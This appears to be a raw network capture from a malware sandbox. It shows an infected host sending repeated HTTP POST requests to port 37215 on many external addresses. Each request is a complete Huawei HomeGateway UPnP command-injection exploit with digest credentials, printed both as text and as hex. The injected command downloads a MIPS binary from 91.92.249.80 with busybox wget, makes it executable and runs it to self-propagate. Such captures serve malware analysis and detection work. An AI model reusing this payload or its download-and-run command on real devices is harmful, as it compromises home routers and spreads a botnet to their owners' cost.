                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2326192.168.2.235135441.25.15.15537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.669275999 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2327192.168.2.2348472197.24.120.20637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.669277906 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2328192.168.2.2342466157.3.152.1137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.669307947 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2329192.168.2.2354758168.17.170.1237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.669318914 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2330192.168.2.234467241.71.133.10137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.669322014 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2331192.168.2.2342706157.140.54.5637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.669342995 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2332192.168.2.2345274168.228.47.5337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.669492006 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2333192.168.2.2359616157.214.185.14237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.669513941 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2334192.168.2.233998218.47.195.11737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.669517994 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2335192.168.2.2341010189.94.190.437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.669528008 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2336192.168.2.2343312157.18.216.13337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.669709921 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
